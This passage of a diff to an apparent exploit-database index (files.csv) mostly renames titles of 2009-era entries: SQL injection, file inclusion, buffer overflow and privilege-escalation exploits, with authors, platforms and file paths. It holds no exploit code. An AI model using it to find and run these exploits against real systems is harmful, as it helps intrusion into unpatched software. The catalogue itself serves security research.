Component com_joomloc (id) SQL Injection Vulnerability",2009-09-09,"Chip D3 Bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS <= 0.4 Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 @@ -9083,7 +9083,7 @@ id,file,description,date,author,platform,type,port 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 Multiple RFI Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0 9624,platforms/windows/local/9624.py,"KSP 2009R2 (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0 -9625,platforms/php/webapps/9625.txt,"Nullam Blog 0.1.2 (LFI/FD/SQL/XSS) Multiple Remote Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 +9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 (lfi/fd/sql/xss) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC",2009-09-10,Dr_IDE,windows,dos,0 9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0 9628,platforms/windows/local/9628.pl,"Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,germaya_x,windows,local,0 @@ -9098,10 +9098,10 @@ id,file,description,date,author,platform,type,port 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 Multiple Blind SQL Injection Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HacKeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HacKeR,php,webapps,0 -9640,platforms/php/webapps/9640.txt,"Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 +9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)",2009-09-11,"Matthew Gillespie",multiple,dos,1812 -9643,platforms/windows/remote/9643.txt,"Kolibri+ Webserver 2 Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 +9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,Blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 @@ -9155,14 +9155,14 @@ id,file,description,date,author,platform,type,port 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,Snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) SQL Injection Vulnerability",2009-09-16,"Chip D3 Bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip D3 Bi0s",php,webapps,0 -9699,platforms/php/webapps/9699.txt,"MicroCMS 3.5 (SQL/LFI) Multiple Remote Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 +9699,platforms/php/webapps/9699.txt,"microcms 3.5 (sql/lfi) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"Saphplesson 4.3 Remote Blind SQL Injection Exploit",2009-09-16,"Jafer Al Zidjali",php,webapps,0 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow PoC (0day)",2009-09-16,"fl0 fl0w",windows,dos,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability",2009-09-16,Snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability",2009-09-16,cr4wl3r,php,webapps,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BOF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 -9706,platforms/php/webapps/9706.txt,"Joomla Component com_album 1.14 Directory Traversal Vulnerability",2009-09-17,DreamTurk,php,webapps,0 +9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal vulnerability",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 (.wav file) Local Crash PoC",2009-09-17,zAx,windows,dos,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability",2009-09-17,"EA Ngel",php,webapps,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0 @@ -9171,7 +9171,7 @@ id,file,description,date,author,platform,type,port 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla Component com_jreservation 1.5 (pid) Blind SQL Injection Exploit",2009-09-17,"Chip D3 Bi0s",php,webapps,0 9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 -9715,platforms/multiple/webapps/9715.txt,"Zainu - Version 1.0 Remote SQL Injection Vulnerability",2009-09-18,Snakespc,multiple,webapps,0 +9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - Remote SQL Injection Vulnerability",2009-09-18,Snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System [header.php] Remote File Include",2009-09-18,"EA Ngel",multiple,webapps,0 9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server <= 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - XSS / Directory Traversal Vulnerability",2009-09-18,Stack,multiple,remote,0 @@ -9225,12 +9225,12 @@ id,file,description,date,author,platform,type,port 9833,platforms/php/webapps/9833.txt,"Joomla com_facebook SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0 -9836,platforms/php/webapps/9836.txt,"BPMusic 1.0 blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 -9837,platforms/php/webapps/9837.txt,"BPStudent 1.0 blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 -9838,platforms/php/webapps/9838.pl,"BPGames 1.0 blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 +9836,platforms/php/webapps/9836.txt,"BPMusic 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 +9837,platforms/php/webapps/9837.txt,"BPStudent 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 +9838,platforms/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 -9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 +9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 @@ -9242,9 +9242,9 @@ id,file,description,date,author,platform,type,port 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 .m3u file Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow",2009-11-02,"Nikolas Sotiriu",windows,remote,0 -9854,platforms/php/webapps/9854.txt,"TFTgallery .13 Directory Traversal Exploit",2009-11-02,Blake,php,webapps,0 +9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal exploit",2009-11-02,Blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 -9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 +9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 xss",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS Hardcoded Password Vulnerability 4.7.0",2009-10-08,"Marek Kroemeke",hardware,remote,8022 9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 @@ -9256,7 +9256,7 @@ id,file,description,date,author,platform,type,port 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0 9867,platforms/php/webapps/9867.txt,"Amiro.CMS <= 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/local/9871.txt,"Boloto Media Player 1.0.0.9 pls file DoS",2009-10-27,Dr_IDE,windows,local,0 -9872,platforms/multiple/webapps/9872.txt,"Boxalino 09.05.25-0421 Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 +9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee <= 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 9874,platforms/windows/webapps/9874.txt,"Cherokee web server 0.5.4 DoS",2009-10-26,"Usman Saeed",windows,webapps,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 @@ -9315,7 +9315,7 @@ id,file,description,date,author,platform,type,port 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0 -9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 Date Overflow",2004-05-19,spoonm,multiple,remote,3690 +9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0 @@ -9453,7 +9453,7 @@ id,file,description,date,author,platform,type,port 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 10084,platforms/windows/local/10084.txt,"Quick Heal v.10.00 SP1 Local Privilege Escalation Vulnerability",2009-10-13,"Maxim A. Kulakov",windows,local,0 -10085,platforms/jsp/webapps/10085.txt,"ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 +10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0 10087,platforms/multiple/remote/10087.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability",2009-11-10,"Fernando Arnaboldi",php,webapps,0 @@ -9465,11 +9465,11 @@ id,file,description,date,author,platform,type,port 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting",2009-10-15,IBM,jsp,webapps,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 -10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 +10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21 -10101,platforms/php/webapps/10101.txt,"Telepark Wiki 2.4.23 - Multiple Remote Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 +10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 @@ -9491,8 +9491,8 @@ id,file,description,date,author,platform,type,port 10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code Vulnerability",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla Ext. iF Portfolio Nexus SQL injection",2009-11-18,"599eme Man",php,webapps,0 10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Include Vulnerability",2009-10-20,kaMtiEz,php,webapps,0 -10180,platforms/php/webapps/10180.txt,"Simplog v0.9.3.2 Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 -10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 Remote File Inclusion Vulnerability",2005-06-15,"Don Tukulesto",php,webapps,0 +10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 +10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion Vulnerability",2005-06-15,"Don Tukulesto",php,webapps,0 10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 Remote DoS",2009-10-29,hkm,hardware,dos,0 10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE upload vulnerability",2009-11-19,daath,php,webapps,80 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 @@ -9516,11 +9516,11 @@ id,file,description,date,author,platform,type,port 10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery (farbinform_krell) Remote SQL Injection Vulnerability",2009-11-23,"Manas58 BAYBORA",php,webapps,0 -10216,platforms/php/webapps/10216.txt,"KR-Web <= 1.1b2 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 +10216,platforms/php/webapps/10216.txt,"kr-web <= 1.1b2 - Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 10217,platforms/php/webapps/10217.txt,"NukeHall <= 0.3 Multiple Remote File Inclusion Vulnerabilities",2009-11-24,cr4wl3r,php,webapps,0 -10218,platforms/php/webapps/10218.txt,"Outreach Project Tool <= 1.2.6 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 -10219,platforms/php/webapps/10219.txt,"phptraverse <= 0.8.0 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 -10220,platforms/php/webapps/10220.txt,"PointComma <= 3.8b2 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 +10218,platforms/php/webapps/10218.txt,"outreach project tool <= 1.2.6 - Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 +10219,platforms/php/webapps/10219.txt,"phptraverse <= 0.8.0 - Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 +10220,platforms/php/webapps/10220.txt,"pointcomma <= 3.8b2 - Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability",2009-11-24,leinakesi,windows,dos,21 10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection Vulnerability",2009-11-24,ViRuS_HiMa,php,webapps,0 10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 APPE DELE DOS",2009-11-24,leinakesi,windows,dos,21 @@ -9547,8 +9547,8 @@ id,file,description,date,author,platform,type,port 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 Remote File Include Vulnerability",2009-11-29,cr4wl3r,php,webapps,0 10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection",2009-11-27,K053,hardware,webapps,0 -10248,platforms/php/webapps/10248.txt,"Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities",2009-11-29,waraxe,php,webapps,0 -10249,platforms/php/webapps/10249.txt,"AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability",2009-11-29,v3n0m,php,webapps,0 +10248,platforms/php/webapps/10248.txt,"sugar crm 5.5.0.rc2 and 5.2.0j Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps,0 +10249,platforms/php/webapps/10249.txt,"adaptcms lite 1.5 - Remote File Inclusion Vulnerability",2009-11-29,v3n0m,php,webapps,0 10250,platforms/php/webapps/10250.txt,"Joomla Component MusicGallery SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0 10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0 10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS SQL Injection Vulnerability",2009-11-30,Isfahan,asp,webapps,0 @@ -9561,7 +9561,7 @@ id,file,description,date,author,platform,type,port 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80 10262,platforms/linux/webapps/10262.txt,"ISPworker <= 1.23 Remote File Disclosure exploit",2009-12-01,cr4wl3r,linux,webapps,80 -10263,platforms/linux/webapps/10263.txt,"Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerabilities",2009-12-01,cr4wl3r,linux,webapps,80 +10263,platforms/linux/webapps/10263.txt,"quate cms <= 0.3.5 (rfi/lfi) Multiple Vulnerabilities",2009-12-01,cr4wl3r,linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10266,platforms/multiple/local/10266.txt,"Oracle ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -9569,9 +9569,9 @@ id,file,description,date,author,platform,type,port 10268,platforms/multiple/local/10268.txt,"Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component 1.0 - SQL Injection Vulnerability",2009-12-01,"Don Tukulesto",php,webapps,0 -10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 +10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component 0.15 - Multiple Remote File Include Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 -10275,platforms/php/webapps/10275.txt,"Kide Shoutbox v0.4.6 XSS & AXFR",2009-12-02,andresg888,php,webapps,0 +10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS & AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware <= 0.5.3 Multiple Remote File Include Exploit",2009-12-03,cr4wl3r,php,webapps,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 @@ -9608,7 +9608,7 @@ id,file,description,date,author,platform,type,port 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2009-12-05,Encrypt3d.M!Nd,windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer overflow Exploit",2009-12-05,Encrypt3d.M!Nd,windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 -10324,platforms/php/webapps/10324.txt,"PhpShop 0.8.1 Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 +10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0 @@ -9631,12 +9631,12 @@ id,file,description,date,author,platform,type,port 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP web server off-by-one buffer overflow vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX and Cr3w-DZ",php,webapps,0 -10351,platforms/php/webapps/10351.txt,"MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 +10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI, RFI, and XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG vF8.2, F8.0, F7.2, and F6.3 Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS vulnerability",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL injection vulnerability",2009-12-08,Palyo34,php,webapps,0 -10357,platforms/php/webapps/10357.txt,"Alqatari group Version 1.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 +10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 @@ -9658,7 +9658,7 @@ id,file,description,date,author,platform,type,port 10377,platforms/windows/dos/10377.txt,"IBM SolidDB invalid error code vulnerability",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 10379,platforms/php/webapps/10379.txt,"oBlog Persistant XSS, CSRF, Admin Bruteforce",2009-12-11,"Milos Zivanovic",php,webapps,0 -10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 Array Overrun (code execution) 0day",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 +10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun (code execution) 0day",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store SQL Injection Vulnerability",2009-12-11,"Salvatore Fresta",php,webapps,0 10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 Multiple XSS",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 @@ -9681,11 +9681,11 @@ id,file,description,date,author,platform,type,port 10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection 